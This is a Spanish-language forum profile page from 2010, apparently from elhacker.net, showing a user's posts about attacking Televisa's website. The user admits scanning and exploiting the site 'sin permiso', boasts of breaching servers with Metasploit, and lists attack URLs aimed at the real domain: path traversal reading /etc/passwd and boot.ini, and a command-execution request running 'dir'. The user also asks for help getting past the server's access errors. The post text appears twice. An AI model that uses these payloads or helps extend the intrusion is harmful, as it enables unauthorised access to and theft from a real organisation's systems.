pz obvio, usa varios scanner, ya habia podido vulnerar servidores, con metasploit,
mira, utilizo nmap+nessus+metasploit
mira, utilizo nmap+nessus+metasploit
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Páginas1
#1
Nivel Web / Re: vulnerabilidad en la pagina de televisa...necesito su ayuda
29 Junio 2010, 06:25 AM #2
Nivel Web / vulnerabilidad en la pagina de televisa...necesito su ayuda
29 Junio 2010, 06:10 AM
hola, soy nuevo jeje, pero bueno, espero que me ayuden 
, bueno eh hecho una auditoria de seguridad en la pagina web de televisa (obviamente sin permiso) y bueno encontré aproximadamente 252 bugs de las cuales unos 60 son de gravedad, la mayoria de los bugs tiene la vulnerabilidad de unicode, con solo ir a la direccion que te dice el script arrogado puedes ver el disco duro y agregando otros parametros puedes transferir un archivo mediante TFTP, pero bueno, al ir a dicho link no me permite ver lo que tiene, ya que tiene un molesto mensaje que dice, el documento que intento buscar no existe en nuestro servidor o no tiene permiso para acceder a el. bueno que puedo hacer para saltarme esto, por cierto ya lanze un exploit contra el servidor pero me arroga el mismo error, cuando trato de conectar con dichos links me dice lo mismo, bueno aqui les dejo los links
http://www.televisa.com/mailview.cgi?cmd=view&fldrname=inbox&select=1&html=../../../../../../etc/passwd
http://www.televisa.com/cgi-bin/w3-msql
http://www.televisa.com/cgi-bin/cmd1.exe?/c+dir
http://www.televisa.com/cgi-bin/websync.exe?ed=&Es=7x1x101&un=nahual&hn=lab&rpt=/scheduler/En_US/WebResources&cbn=/cgi-bin/websync.exe&dow=sun&dmy=Off&tfh=Off&lan=En_US&ix=0&amd=2&epw=WiXwWFp&mrd=-1&mrc=0&mrb=0&bnv=9&ds=7x1x101&tzs=PST8PDT
http://www.televisa.com/boilerplate.asp?NFuse_Template=../../boot.ini&NFuse_CurrentFolder=/SSLx0020Directories
buenos son algunos de 60 links, esta claro que el servidor se trata de windows, ya que estuve estudiando los links y te manejan dll y exe
salu2 espero que me ayuden
gracias
, bueno eh hecho una auditoria de seguridad en la pagina web de televisa (obviamente sin permiso) y bueno encontré aproximadamente 252 bugs de las cuales unos 60 son de gravedad, la mayoria de los bugs tiene la vulnerabilidad de unicode, con solo ir a la direccion que te dice el script arrogado puedes ver el disco duro y agregando otros parametros puedes transferir un archivo mediante TFTP, pero bueno, al ir a dicho link no me permite ver lo que tiene, ya que tiene un molesto mensaje que dice, el documento que intento buscar no existe en nuestro servidor o no tiene permiso para acceder a el. bueno que puedo hacer para saltarme esto, por cierto ya lanze un exploit contra el servidor pero me arroga el mismo error, cuando trato de conectar con dichos links me dice lo mismo, bueno aqui les dejo los links http://www.televisa.com/mailview.cgi?cmd=view&fldrname=inbox&select=1&html=../../../../../../etc/passwd
http://www.televisa.com/cgi-bin/w3-msql
http://www.televisa.com/cgi-bin/cmd1.exe?/c+dir
http://www.televisa.com/cgi-bin/websync.exe?ed=&Es=7x1x101&un=nahual&hn=lab&rpt=/scheduler/En_US/WebResources&cbn=/cgi-bin/websync.exe&dow=sun&dmy=Off&tfh=Off&lan=En_US&ix=0&amd=2&epw=WiXwWFp&mrd=-1&mrc=0&mrb=0&bnv=9&ds=7x1x101&tzs=PST8PDT
http://www.televisa.com/boilerplate.asp?NFuse_Template=../../boot.ini&NFuse_CurrentFolder=/SSLx0020Directories
buenos son algunos de 60 links, esta claro que el servidor se trata de windows, ya que estuve estudiando los links y te manejan dll y exe
salu2 espero que me ayuden
gracias
Páginas1